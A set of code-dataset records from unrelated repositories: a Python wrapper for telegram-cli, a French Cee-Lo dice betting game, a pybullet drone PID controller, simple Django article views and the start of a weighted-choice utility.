SIG_IGN.\n '''\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n\nclass TelegramCliExited(RuntimeError):\n pass\n\nclass TelegramCliInterface:\n def __init__(self, cmd, extra_args=(), run=True, timeout=60, ignore_sigint=True):\n self.cmd = cmd\n self.extra_args = tuple(extra_args)\n self.proc = None\n self.sock = None\n self.buffer = b''\n self.ready = threading.Event()\n self.closed = False\n self.thread = None\n self.tmpdir = tempfile.mkdtemp()\n self.timeout = timeout\n self.ignore_sigint = ignore_sigint\n # Event callbacks\n # `on_info`, `on_json` and `on_text` are for stdout\n self.on_info = logger.info\n self.on_json = logger.debug\n self.on_text = do_nothing\n self.on_start = lambda: logger.info('Telegram-cli started.')\n self.on_exit = lambda: logger.warning('Telegram-cli died.')\n if run:\n self.run()\n\n def _get_pubkey(self):\n tgdir = os.path.abspath(os.path.join(os.path.dirname(\n os.path.realpath(self.cmd)), '..'))\n paths = [\n os.path.join(tgdir, 'tg-server.pub'),\n os.path.join(tgdir, 'server.pub'),\n '/etc/telegram-cli/server.pub',\n '/usr/local/etc/telegram-cli/server.pub',\n os.path.join(self.tmpdir, 'tg-server.pub')\n ]\n for path in paths:\n if os.path.isfile(path):\n return path\n else:\n with open(path, 'w') as f:\n f.write(tg_server_pub)\n return path\n\n def checkproc(self):\n if self.closed or self.proc and self.proc.poll() is None:\n return self.proc\n sockfile = os.path.join(self.tmpdir, 'tgcli.sock')\n if os.path.exists(sockfile):\n os.unlink(sockfile)\n self.proc = subprocess.Popen((self.cmd, '-k', 
self._get_pubkey(),\n '--json', '-R', '-C', '-S', sockfile) + self.extra_args,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n preexec_fn=preexec_ignore_sigint if self.ignore_sigint else None)\n while not os.path.exists(sockfile):\n time.sleep(0.5)\n self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self.sock.connect(sockfile)\n return self.proc\n\n def _run_cli(self):\n while not self.closed:\n self.checkproc()\n try:\n while not self.closed:\n out = self.proc.stdout.readline().decode('utf-8')\n if not out:\n break\n elif not self.ready.is_set():\n self.on_start()\n self.ready.set()\n self.on_text(out)\n if out[0] in '[{':\n try:\n self.on_json(json.loads(out.strip()))\n except ValueError:\n self.on_info(out.strip())\n else:\n self.on_info(out.strip())\n except BrokenPipeError:\n pass\n finally:\n try:\n self.sock.shutdown(socket.SHUT_RDWR)\n except Exception:\n pass\n if self.proc and self.proc.poll() is None:\n self.proc.terminate()\n self.proc.wait()\n self.ready.clear()\n self.on_exit()\n\n def run(self):\n self.thread = threading.Thread(target=self._run_cli)\n self.thread.daemon = True\n self.thread.start()\n self.ready.wait()\n\n def restart(self):\n self.close()\n self.closed = False\n self.tmpdir = tempfile.mkdtemp()\n self.run()\n\n def close(self):\n if self.closed:\n return\n self.closed = True\n self.ready.clear()\n try:\n self.proc.wait(2)\n except subprocess.TimeoutExpired:\n self.proc.kill()\n if self.thread:\n self.thread.join(1)\n if os.path.isdir(self.tmpdir):\n shutil.rmtree(self.tmpdir, True)\n self.tmpdir = None\n\n def __enter__(self):\n if not self.thread:\n self.run()\n self.ready.wait()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n\n def __del__(self):\n self.close()\n\n def _readline(self):\n while self.ready.is_set():\n lines = self.buffer.split(b'\\n', 1)\n if len(lines) > 1:\n self.buffer = lines[1]\n return lines[0] + b'\\n'\n else:\n self.buffer += self.sock.recv(1024)\n # usually there is an assertion error\n raise TelegramCliExited('telegram-cli unexpectedly exited.')\n\n def send_command(self, cmd, timeout=None, resync=True):\n '''\n Send a command to tg-cli.\n use `resync` for consuming text since last timeout.\n '''\n logger.debug(cmd)\n self.ready.wait()\n self.sock.settimeout(timeout or self.timeout)\n self.sock.sendall(cmd.encode('utf-8') + b'\\n')\n line = self._readline()\n while resync and not line.startswith(b'ANSWER '):\n line = self._readline()\n size = int(line[7:].decode('ascii'))\n reply = b''\n while len(reply) < size:\n reply += self._readline()\n ret = reply.decode('utf-8')\n try:\n return json.loads(ret)\n except ValueError:\n return ret\n\n def __getattr__(self, name):\n '''\n Convenience command calling: cmd_*(*args, **kwargs)\n `args` are for the tg-cli command\n `kwargs` are for `send_command`\n '''\n if name.startswith('cmd_'):\n fn = lambda *args, **kwargs: self.send_command(\n ' '.join(map(str, (name[4:],) + args)), **kwargs)\n return fn\n else:\n raise AttributeError('TelegramCliInterface has no attribute %r' % name)\n\nif __name__ == \"__main__\":\n import sys\n logging.basicConfig(stream=sys.stderr, format='%(asctime)s [%(levelname)s] %(message)s', level=logging.INFO)\n with TelegramCliInterface(sys.argv[1]) as tgcli:\n for ln in sys.stdin:\n try:\n cmd = ln.strip()\n print(tgcli.send_command(cmd))\n except Exception:\n logging.exception('Failed to execute: ' + 
cmd)\n","repo_name":"gumblex/tg-export","sub_path":"tgcli.py","file_name":"tgcli.py","file_ext":"py","file_size_in_byte":8131,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"53"} +{"seq_id":"40332874153","text":"import random\n#import main\nimport utilFunctions\n\n#############################################################################\n#################### GAME FUNCTIONS ############################################\n#############################################################################\n\n\ndef tirage_des():\n \"\"\"Fonction qui simule un lancer de trois dés\"\"\"\n L=[]\n for i in range(3):\n L.append(random.randint(1,6))\n return(L)\n\n\n\ndef rec_main(tirage):\n \"\"\"fonction qui donne le score de la main actuelle, suivant le modèle suivant\n Type de main | Score\n 111 -> 13\n 666 -> 12\n 555 -> 11\n 444 -> 10\n 333 -> 9\n 222 -> 8\n {456} -> 7\n {bAb} -> A (de 6 a 1)\n {123} -> 0\n {ABC} -> -404\n \"\"\"\n nbDesIdentiques=0\n for i in range(1,7):\n if(tirage.count(i)>nbDesIdentiques):\n nbDesIdentiques=tirage.count(i)\n valeurDe=i\n\n if(nbDesIdentiques==3)&(valeurDe==1):\n return(13)\n\n elif (nbDesIdentiques==3):\n return(6+valeurDe)\n\n elif (nbDesIdentiques ==2):\n for elem in tirage:\n if(elem != valeurDe):\n return(elem)\n\n elif (4 in tirage) & (5 in tirage) & (6 in tirage):\n return(7)\n\n elif (1 in tirage) & (2 in tirage) & (3 in tirage):\n return(0)\n else:\n return(-404)\n\n\n\n\ndef rec_jeu():\n \"\"\"fonction qui réalise les trois lancers autorisés, et qui renvoie le premier score obtenu\"\"\"\n for i in range(2): #on ne realise que deux lancers d'abord, car on renverra forcement le score du troisième\n main=tirage_des()\n input(utilFunctions.centerText(\"Lancer {} : {}\".format(i+1,main)))\n if (rec_main(main)!=-404): #si on a rien obtenu, on est autorisé a relancer, mais si on a ne serait-ce que 0 points, on doit le garder\n print(utilFunctions.centerText(\"{} donne un score de {} au Cee-Lo !\".format(main,rec_main(main))))\n return(rec_main(main))\n\n main=tirage_des()\n input(utilFunctions.centerText(\"Lancer 3 : {}\".format(main)))\n print(utilFunctions.centerText(\"{} donne un score de {} au Cee-Lo !\".format(main,rec_main(main))))\n return(rec_main(main))\n\n\n\n\ndef scoretocoeff(score):\n \"\"\"fonction qui determine le coefficient multiplicateur de la mise en fonction du score\"\"\"\n if score ==13:\t\t#cas Snake Eyes {111}\n return(5)\n elif (score == 12) | (score == 11) | (score == 10) | (score == 9) | (score == 8): #Cas {aaa} sauf a=1\n return(4)\n elif score == 7: #Cas {456}\n return(3)\n elif (score == 6) | (score == 5) | (score == 4) | (score == 3) | (score == 2) | (score == 1): #Cas {AAB}\n return(2)\n else:\t\t\t\t#englobe les cas ou score = 0 {123} (car c'est lors du tirage de cette combinaison sur l'on double la mise)\n return(1)\t\t# et score =-404 (car alors on a juste perdu sa mise, donc *1)\n\n\n\n\n\ndef dealer_turn():\n \"\"\"fonction qui gère le tour du DEALER\"\"\"\n dealerName = utilFunctions.getDealer()\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n namesList = utilFunctions.getNameListTmp()\n print(utilFunctions.centerText(\"Le dealer : {} joue\".format(dealerName)))\n score_dealer=rec_jeu()\n if score_dealer == 0:\t\t\t\t#Si le dealer tire {123}, il doit doubler la mise de tout les joueurs\n print(utilFunctions.centerText(\"Le dealer {} obtient 1,2,3 ! Il double la mise de tout le monde ! 
\".format(dealerName)))\n for name in namesList:\n if name == dealerName:\t\t\t#il ne fait rien sur sa mise ( qui est de 0.0 forcement)\n pass\n else:\t\t\t\t\t#et double celle des autres, quitte a passer en négatif\n cashTab[dealerName]-=miseTab[name]\n miseTab[name]*=2\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n return(score_dealer)\n\n\n\n\n\ndef allTurns(dealerScore):\n \"\"\"fonction qui gère l'affrontement de tous les jouers face au dealer, prend en argument le score du dealer\"\"\"\n nameList = utilFunctions.getNameListTmp()\n dealerName = utilFunctions.getDealer()\n for name in nameList:\n if name == dealerName:\n pass\n else:\n print(utilFunctions.centerText(\"Tour de {}\".format(name)))\n joueurVsDealer(name,dealerScore)\n input()\n utilFunctions.setHeader()\n\n\n\n\n\ndef joueurVsDealer(name,dealerScore):\n \"\"\"fonction qui gère un affrontement entre un joueur et le dealer, prend en argument le numero du joueur actuel et le score du dealer actuel\"\"\"\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n dealerName = utilFunctions.getDealer()\n joueurScore=rec_jeu() #On tire la main du joueur et on en déduit son score\n print(utilFunctions.centerText(\"{} a obtenu {} !\".format(name,joueurScore)))\n\n if joueurScore==0:\t\t\t\t\t#Si le joueur a tiré {123}, il se voit obligé de doubler sa mise\n print(utilFunctions.centerText(\"Double la mise !\"))\n if (cashTab[name] < miseTab[name]): #Cas ou le joueur ne peut pas doubler sa mise\n miseTab[name]+=cashTab[name]\n cashTab[name] = 0\n else:\t\t\t\t\t\t\t #Cas ou il a assez d'argent pour doubler\n cashTab[name]-=miseTab[name]\n miseTab[name]*=2\n\n if joueurScore < dealerScore:\t\t\t#Cas ou le dealer gagne\n\n print(utilFunctions.centerText(\"{} perd face au dealer, il perd {}*{}, soit {}€ !\".format(name,miseTab[name],scoretocoeff(dealerScore),miseTab[name]*scoretocoeff(dealerScore))))\n dette=miseTab[name]*scoretocoeff(dealerScore) #La dette est la somme que doit payer le joueur au dealer\n if dette > (cashTab[name]+miseTab[name]):\t\t\t\t\t#Si elle est superieure au total (cashtab+mise) du joueur\n cashTab[dealerName]=cashTab[dealerName]+cashTab[dealerName]+miseTab[name] #Le dealer empoche la totalité de l'argent du joueur (cashtab+mise)\n cashTab[name]=0\t\t\t\t\t\t\t\t\t\t\t#et le joueur est a 0 (il ne peut pas être en négatif)\n else:\t\t\t\t\t\t\t\t\t\t\t\t#sinon\n cashTab[name]=(cashTab[name]-dette)+ miseTab[name]\t\t\t\t#le joueur voit son solde déduit de la dette mais récupère sa mise\n cashTab[dealerName]+=dette\t\t\t\t\t\t\t\t\t#le dealer empoche la dette\n\n\n elif joueurScore >dealerScore:\t\t#Cas ou le dealer perd\n\n print(utilFunctions.centerText(\"Le dealer s'écroule face a {}, il perd {}*{}, soit {}€ !\".format(name,miseTab[name],scoretocoeff(joueurScore),miseTab[name]*scoretocoeff(joueurScore))))\n dette=miseTab[name]*scoretocoeff(joueurScore) \t#la dette est la somme que doit le dealer au joueur pour ce tour\n if dette > cashTab[dealerName]:\t\t\t#Cas ou le dealer ne peut rembourser la dette en entier\n if cashTab[dealerName] < 0:\t\t\t\t#Si le dealer est deja endeté\n cashTab[name]+=miseTab[name]\t\t\t\t#le joueur reprend simplement sa mise\n else:\t\t\t\t\t\t\t\t#sinon\n cashTab[name]=cashTab[name]+cashTab[dealerName]+miseTab[name] #Le joueur prend l'integralité du cashtab du dealer et reprend sa mise\n else:\t\t\t\t\t\t\t\t#Cas ou le dealer a suffisamment d'argent pour payer\n cashTab[name]=cashTab[name]+dette+miseTab[name]\t\t\t\t\t#le joueur empoche 
la dette et reprend sa mise\n cashTab[dealerName]-=dette\t\t\t\t#Dans tous les cas, le dealer s'alourdit de la dette (il peut être en négatif pendant son tour, lui)\n\n\n else:\t\t\t\t\t\t\t\t\t#Cas d'égalité entre le joueur et le dealer\n print(utilFunctions.centerText(\"Egalité, {} reprend sa mise\".format(name)))\n cashTab[name]+=miseTab[name]\t\t\t\t#le joueur reprend sa mise\n\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n\n\n\ndef fullTurn():\n \"\"\"fonction qui simule un tour de jeu complet, de la mise à l'elimination des perdants\"\"\"\n utilFunctions.setHeader()\n utilFunctions.initMiseTab()\n miseAll()\n dealerScore = dealer_turn()\n allTurns(dealerScore)\n losersElim()\n input()\n\n\ndef losersElim():\n \"\"\"fonction qui gère l'elimination des perdants en fonction de l'argent qui leur reste\"\"\"\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n listeLosers = []\n for name in cashTab: #recherche des eventuels perdants\n if(cashTab[name] <= 0):\n print(utilFunctions.centerText(\"{} n'a plus d'argent, il est eliminé\".format(name)))\n listeLosers.append(name)\n data = utilFunctions.getData()\n dealerId = data[\"dealerId\"]\n nameList =data[\"namesListTmp\"]\n dealerId = (dealerId+1)%(len(nameList))\n while(nameList[dealerId] in listeLosers): #recherche du nouveau dealer\n dealerId = (dealerId+1)%(len(nameList))\n data['dealerId'] = dealerId\n dealerName = nameList[dealerId]\n data['dealerName'] = dealerName\n for loser in listeLosers: #elimination de tous les perdants\n nameList.remove(loser)\n data['namesListTmp'] = nameList #actualisation de la liste des joueurs actuels\n for i in range (len(nameList)):\n if(nameList[i] == dealerName):\n data[\"dealerId\"] = i\n data['nbPlayersTmp']-=1\n cashTab.pop(loser)\n miseTab.pop(loser)\n utilFunctions.setData(data)\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n\ndef runNbTurnsGame():\n \"\"\"fonction qui simule une partie en nb tours\"\"\"\n utilFunctions.initCashTab()\n utilFunctions.initMiseTab()\n nbTurns =utilFunctions.getNbTurns()\n data = utilFunctions.getData()\n data['namesListTmp'] = list(data['namesList'])\n data['nbPlayersTmp'] = data['nbPlayers']\n data['dealerId'] = random.randint(0,data['nbPlayers']-1)\n data['dealerName'] = data['namesList'][data['dealerId']]\n utilFunctions.setData(data)\n for i in range(nbTurns):\n fullTurn()\n cashTab = utilFunctions.getCashTab() #on recupère le cashtab après les nb tours\n nameWinner = \"\"\n cashWinner = 0\n for name in cashTab:\n if(cashTab[name] > cashWinner):\n cashWinner = cashTab[name]\n nameWinner = name #le gagnant est le plus riche\n print(utilFunctions.centerText(\"Le gagnant est {}, il a remporté {}€ !\".format(nameWinner,cashWinner)))\n input()\n\ndef runDeathGame():\n \"\"\"fonction qui simule une partie de type match à mort\"\"\"\n utilFunctions.initCashTab()\n utilFunctions.initMiseTab()\n cashTab = utilFunctions.getCashTab()\n data = utilFunctions.getData()\n data['namesListTmp'] = list(data['namesList'])\n data['nbPlayersTmp'] = data['nbPlayers']\n data['dealerId'] = random.randint(0,data['nbPlayers']-1)\n data['dealerName'] = data['namesList'][data['dealerId']]\n utilFunctions.setData(data)\n while(len(cashTab) != 1): #tant qu'il y a plus d'un joueur dans le cashtab\n fullTurn()\n cashTab =utilFunctions.getCashTab()\n for winner in cashTab:\n nameWinner = winner\n cashWinner = cashTab[winner]\n print(utilFunctions.centerText(\"{} est le seul survivant de Cee-Lo, il a gagné 
{}€\".format(nameWinner,cashWinner)))\n input()\n\n\n#############################################################################\n################ ADVERSARY FUNCTIONS ############################################\n#############################################################################\n\ndef miseAdversary(name):\n \"\"\"fonction qui simule la mise d'un adversaire\"\"\"\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n sup = cashTab[name]\n mise=random.randint(1,sup)\n cashTab[name] = cashTab[name] - mise\n miseTab[name] = mise\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n print(utilFunctions.centerText(\"{} mise {}€ !\".format(name, mise)))\n\n\ndef miseAll():\n \"\"\"fonction qui gère la mise de tous les joueurs\"\"\"\n cashTab = utilFunctions.getCashTab()\n playerName = utilFunctions.getPlayerName()\n dealerName = utilFunctions.getDealer()\n\n for name in cashTab:\n if(name == dealerName):\n pass\n else:\n print(utilFunctions.centerText(\"{} est en train de miser\".format(name)))\n if(name == playerName):\n misePlayer()\n else:\n miseAdversary(name)\n input()\n utilFunctions.setHeader()\n\n\n\n\n\n#############################################################################\n################## PLAYER FUNCTIONS ############################################\n#############################################################################\n\ndef misePlayer():\n \"\"\"fonction qui gère la mise du joueur\"\"\"\n playerName = utilFunctions.getPlayerName()\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n cashMax = cashTab[playerName]\n MISEFLAG = False\n\n while MISEFLAG != True:\n print(utilFunctions.centerText(\"Vous avez {} €\\n\".format(cashMax)))\n mise = utilFunctions.secureInputInt(utilFunctions.centerText(\"Combien souhaitez-vous miser ce tour-ci ?\\n\"))\n if (mise >= 1) & (mise <= cashMax):\n cashTab[playerName] = cashTab[playerName] - mise\n miseTab[playerName] = mise\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n MISEFLAG=True\n print(utilFunctions.centerText(\"Vous misez {} €\".format(mise)))\n else:\n print(utilFunctions.centerText(\"Vous n'avez pas cette somme\"))\n","repo_name":"SignamarcheixH/Cee-Lo_game","sub_path":"gameFunctions.py","file_name":"gameFunctions.py","file_ext":"py","file_size_in_byte":13626,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21137316500","text":"import math\nimport numpy as np\nimport pybullet as p\nfrom scipy.spatial.transform import Rotation\n\nfrom gym_pybullet_drones.control.BaseControl import BaseControl\nfrom gym_pybullet_drones.envs.BaseAviary import DroneModel, BaseAviary\n\n\nclass CPSControllerDynamics(BaseControl):\n \"\"\"PID control class for Crazyflies.\n\n Based on work conducted at UTIAS' DSL by SiQi Zhou and James Xu.\n\n \"\"\"\n\n ################################################################################\n\n def __init__(self,\n drone_model: DroneModel,\n g: float = 9.8\n ):\n \"\"\"Common control classes __init__ method.\n\n Parameters\n ----------\n drone_model : DroneModel\n The type of drone to control (detailed in an .urdf file in folder `assets`).\n g : float, optional\n The gravitational acceleration in m/s^2.\n\n \"\"\"\n super().__init__(drone_model=drone_model, g=g)\n if self.DRONE_MODEL != DroneModel.CF2X and self.DRONE_MODEL != DroneModel.CF2P:\n print(\"[ERROR] in DSLPIDControl.__init__(), DSLPIDControl requires DroneModel.CF2X or 
DroneModel.CF2P\")\n exit()\n self.mass = self._getURDFParameter('mass')\n self.arm = self._getURDFParameter('arm')\n self.prop_radius = self._getURDFParameter('prop_radius')\n self.P_COEFF_FOR = np.array([.4, .4, 1.25])\n self.I_COEFF_FOR = np.array([.05, .05, .05])\n self.D_COEFF_FOR = np.array([.2, .2, .5])\n self.P_COEFF_TOR = np.array([70000., 70000., 60000.])\n self.I_COEFF_TOR = np.array([.0, .0, 500.])\n self.D_COEFF_TOR = np.array([20000., 20000., 12000.])\n self.PWM2RPM_SCALE = 0.2685\n self.PWM2RPM_CONST = 4070.3\n self.MIN_PWM = 20000\n self.MAX_PWM = 65535\n if self.DRONE_MODEL == DroneModel.CF2X:\n self.MIXER_MATRIX = np.array([[.5, -.5, -1], [.5, .5, 1], [-.5, .5, -1], [-.5, -.5, 1]])\n elif self.DRONE_MODEL == DroneModel.CF2P:\n self.MIXER_MATRIX = np.array([[0, -1, -1], [+1, 0, 1], [0, 1, -1], [-1, 0, 1]])\n self.reset()\n\n ################################################################################\n\n def reset(self):\n \"\"\"Resets the control classes.\n\n The previous step's and integral errors for both position and attitude are set to zero.\n\n \"\"\"\n super().reset()\n #### Store the last roll, pitch, and yaw ###################\n self.last_rpy = np.zeros(3)\n #### Initialized PID control variables #####################\n self.last_pos_e = np.zeros(3)\n self.integral_pos_e = np.zeros(3)\n self.last_rpy_e = np.zeros(3)\n self.integral_rpy_e = np.zeros(3)\n\n ################################################################################\n\n def computeControl(self,\n control_timestep,\n cur_pos,\n cur_quat,\n cur_vel,\n cur_ang_vel,\n target_pos,\n target_rpy=np.zeros(3),\n target_vel=np.zeros(3),\n target_rpy_rates=np.zeros(3)\n ):\n\n self.control_counter += 1\n thrust, computed_target_rpy, pos_e = self._dslPIDPositionControl(control_timestep,\n cur_pos,\n cur_quat,\n cur_vel,\n target_pos,\n target_rpy,\n target_vel\n )\n rpm = self._dslPIDAttitudeControl(control_timestep,\n thrust,\n cur_quat,\n computed_target_rpy,\n target_rpy_rates\n )\n cur_rpy = p.getEulerFromQuaternion(cur_quat)\n return rpm, pos_e, computed_target_rpy[2] - cur_rpy[2]\n\n ################################################################################\n\n def _dslPIDPositionControl(self,\n control_timestep,\n cur_pos,\n cur_quat,\n cur_vel,\n target_pos,\n target_rpy,\n target_vel\n ):\n \"\"\"DSL's CF2.x PID position control.\n\n Parameters\n ----------\n control_timestep : float\n The time step at which control is computed.\n cur_pos : ndarray\n (3,1)-shaped array of floats containing the current position.\n cur_quat : ndarray\n (4,1)-shaped array of floats containing the current orientation as a quaternion.\n cur_vel : ndarray\n (3,1)-shaped array of floats containing the current velocity.\n target_pos : ndarray\n (3,1)-shaped array of floats containing the desired position.\n target_rpy : ndarray\n (3,1)-shaped array of floats containing the desired orientation as roll, pitch, yaw.\n target_vel : ndarray\n (3,1)-shaped array of floats containing the desired velocity.\n\n Returns\n -------\n float\n The target thrust along the drone z-axis.\n ndarray\n (3,1)-shaped array of floats containing the target roll, pitch, and yaw.\n float\n The current position error.\n\n \"\"\"\n cur_rotation = np.array(p.getMatrixFromQuaternion(cur_quat)).reshape(3, 3)\n pos_e = target_pos - cur_pos\n vel_e = target_vel - cur_vel\n self.integral_pos_e = self.integral_pos_e + pos_e * control_timestep\n self.integral_pos_e = np.clip(self.integral_pos_e, -2., 2.)\n self.integral_pos_e[2] = 
np.clip(self.integral_pos_e[2], -0.15, .15)\n #### PID target thrust #####################################\n target_thrust = np.multiply(self.P_COEFF_FOR, pos_e) \\\n + np.multiply(self.I_COEFF_FOR, self.integral_pos_e) \\\n + np.multiply(self.D_COEFF_FOR, vel_e) + np.array([0, 0, self.GRAVITY])\n scalar_thrust = max(0., np.dot(target_thrust, cur_rotation[:, 2])) # Projecting thrust onto the drone's current rotation (as a dot product)\n thrust = (math.sqrt(scalar_thrust / (4 * self.KF)) - self.PWM2RPM_CONST) / self.PWM2RPM_SCALE # TODO What square root this?\n\n #### Translation #########\n # Rotation Matrix to Translate from World Frame to Body Frame\n # V' = V @ Rotation\n # Returns 3D Point in Body Frame\n\n # Rotation Matrix to Translate from Body Frame to World Frame\n # V = R^T @ V'\n\n target_thrust = target_thrust / np.linalg.norm(target_thrust)\n roll, pitch, yaw = target_thrust\n R_x = np.array([[1, 0, 0 ],\n [0, np.cos(roll), np.sin(roll)],\n [0, -1.0*np.sin(roll), np.cos(roll)]])\n\n R_y = np.array([[np.cos(pitch), 0, np.sin(pitch)],\n [0, 1, 0 ],\n [-1.0*np.sin(pitch), 0, np.cos(pitch)]])\n\n R_z = np.array([[np.cos(yaw), -1.0*np.sin(yaw), 0],\n [np.sin(yaw), np.cos(yaw), 0],\n [0, 0, 1]])\n\n new_rot = np.cross(R_x, np.cross(R_y, R_z))\n target_euler_pos = (np.transpose(new_rot) @ np.expand_dims(target_thrust, axis=1)).flatten()\n\n ##### Rotation - Our Problem #######\n # Rotation Matrix to Translate from Body Frame to World Frame\n phi, theta, psi = target_rpy\n R_w = np.array([[1, np.sin(phi)*np.tan(theta), np.cos(phi)*np.tan(theta)],\n [0, np.cos(phi), -1.0*np.sin(phi)],\n [0, np.sin(phi)/np.cos(theta),np.cos(phi)/np.cos(theta)]])\n\n target_euler_rot = (R_w @ np.expand_dims(target_rpy, axis=1)).flatten()\n #target_euler_rot = np.array([np.cos(target_rpy[2]), np.sin(target_rpy[2]), 0])\n target_euler_new = target_euler_rot\n\n return thrust, target_euler_new, pos_e\n\n ################################################################################\n\n def _dslPIDAttitudeControl(self,\n control_timestep,\n thrust,\n cur_quat,\n target_euler,\n target_rpy_rates\n ):\n \"\"\"DSL's CF2.x PID attitude control.\n\n Parameters\n ----------\n control_timestep : float\n The time step at which control is computed.\n thrust : float\n The target thrust along the drone z-axis.\n cur_quat : ndarray\n (4,1)-shaped array of floats containing the current orientation as a quaternion.\n target_euler : ndarray\n (3,1)-shaped array of floats containing the computed target Euler angles.\n target_rpy_rates : ndarray\n (3,1)-shaped array of floats containing the desired roll, pitch, and yaw rates.\n\n Returns\n -------\n ndarray\n (4,1)-shaped array of integers containing the RPMs to apply to each of the 4 motors.\n\n \"\"\"\n cur_rotation = np.array(p.getMatrixFromQuaternion(cur_quat)).reshape(3, 3)\n cur_rpy = np.array(p.getEulerFromQuaternion(cur_quat))\n target_quat = (Rotation.from_euler('XYZ', target_euler, degrees=False)).as_quat()\n w, x, y, z = target_quat\n target_rotation = (Rotation.from_quat([w, x, y, z])).as_matrix()\n rot_matrix_e = np.dot((target_rotation.transpose()), cur_rotation) - np.dot(cur_rotation.transpose(),\n target_rotation)\n rot_e = np.array([rot_matrix_e[2, 1], rot_matrix_e[0, 2], rot_matrix_e[1, 0]])\n rpy_rates_e = target_rpy_rates - (cur_rpy - self.last_rpy) / control_timestep\n self.last_rpy = cur_rpy\n self.integral_rpy_e = self.integral_rpy_e - rot_e * control_timestep\n self.integral_rpy_e = np.clip(self.integral_rpy_e, -1500., 1500.)\n 
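For reference, the tail of `_dslPIDAttitudeControl` just below combines the commanded thrust with the per-axis torques through `MIXER_MATRIX` and converts the clipped PWM to RPM. Here is that mixing step in isolation, with the CF2X constants copied from the class above and toy torque values:

```python
import numpy as np

# Constants copied from the CF2X branch of the controller above.
PWM2RPM_SCALE, PWM2RPM_CONST = 0.2685, 4070.3
MIN_PWM, MAX_PWM = 20000, 65535
MIXER_MATRIX = np.array([[.5, -.5, -1], [.5, .5, 1], [-.5, .5, -1], [-.5, -.5, 1]])

def mix_to_rpm(thrust_pwm, target_torques):
    """Collective thrust (in PWM units) plus roll/pitch/yaw torques -> four
    motor RPMs, the same three lines that close _dslPIDAttitudeControl."""
    pwm = thrust_pwm + MIXER_MATRIX @ np.asarray(target_torques)
    pwm = np.clip(pwm, MIN_PWM, MAX_PWM)
    return PWM2RPM_SCALE * pwm + PWM2RPM_CONST

print(mix_to_rpm(30000.0, [500.0, -200.0, 100.0]))  # toy torque values
```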
self.integral_rpy_e[0:2] = np.clip(self.integral_rpy_e[0:2], -1., 1.)\n #### PID target torques ####################################\n target_torques = - np.multiply(self.P_COEFF_TOR, rot_e) \\\n + np.multiply(self.D_COEFF_TOR, rpy_rates_e) \\\n + np.multiply(self.I_COEFF_TOR, self.integral_rpy_e)\n target_torques = np.clip(target_torques, -3200, 3200)\n pwm = thrust + np.dot(self.MIXER_MATRIX, target_torques)\n pwm = np.clip(pwm, self.MIN_PWM, self.MAX_PWM)\n return self.PWM2RPM_SCALE * pwm + self.PWM2RPM_CONST\n\n ################################################################################\n\n def _one23DInterface(thrust):\n \"\"\"Utility function interfacing 1, 2, or 3D use cases.\n\n Parameters\n ----------\n thrust : ndarray\n Array of floats of length 1, 2, or 4 containing a desired thrust input.\n\n Returns\n -------\n ndarray\n (4,1)-shaped array of integers containing the PWM (not RPMs) to apply to each of the 4 motors.\n\n \"\"\"\n DIM = len(np.array(thrust))\n pwm = np.clip((np.sqrt(np.array(thrust) / (self.KF * (4 / DIM))) - self.PWM2RPM_CONST) / self.PWM2RPM_SCALE,\n self.MIN_PWM, self.MAX_PWM)\n if DIM in [1, 4]:\n return np.repeat(pwm, 4 / DIM)\n elif DIM == 2:\n return np.hstack([pwm, np.flip(pwm)])\n else:\n print(\"[ERROR] in DSLPIDControl._one23DInterface()\")\n exit()\n","repo_name":"MistaMase/513FinalProject","sub_path":"gym-pybullet-drones-1.0.0/CPSControllerDynamics.py","file_name":"CPSControllerDynamics.py","file_ext":"py","file_size_in_byte":12296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70020616808","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Article\nfrom .forms import ArticleForm\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\ndef index(request):\n articles = Article.objects.all()\n context = {\n 'articles': articles,\n }\n return render(request, 'articles/index.html', context)\n\n\ndef create(request):\n return render(request, \"articles/create.html\")\n\n\n@login_required\ndef create(request):\n if request.method == 'POST':\n article_form = ArticleForm(request.POST, request.FILES)\n if article_form.is_valid():\n article = article_form.save(commit=False)\n # 로그인한 유저 => 작성자네!\n article.user = request.user \n article.save()\n messages.success(request, '글 작성이 완료되었습니다.')\n return redirect('articles:index')\n else: \n article_form = ArticleForm()\n context = {\n 'article_form': article_form\n }\n return render(request, 'articles/form.html', context=context)","repo_name":"astroastrum/Django","sub_path":"test_1110/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26606624605","text":"import random\nfrom bisect import bisect\nfrom collections import ChainMap\nfrom typing import Hashable\nfrom .abm import AgentMover\n\nclass CompiledOutcomes():\n def __init__(self, data=None):\n self.outcomes = []\n self.cdf = []\n self.total = 0\n\n if data is not None:\n self.compile(data)\n \n def compile(self, pdict):\n \"\"\"Construct the CDF for the outcome map\"\"\"\n for k,v in pdict.items():\n self.outcomes.append(k)\n self.total += v\n self.cdf.append(self.total)\n\n def weighted_choice(self):\n \"\"\"Provided by Raymond Hettinger on stackoverflow\n O(log(n)) lookup on a compiled CDF object\n \"\"\"\n x = random.random() * self.total\n i = 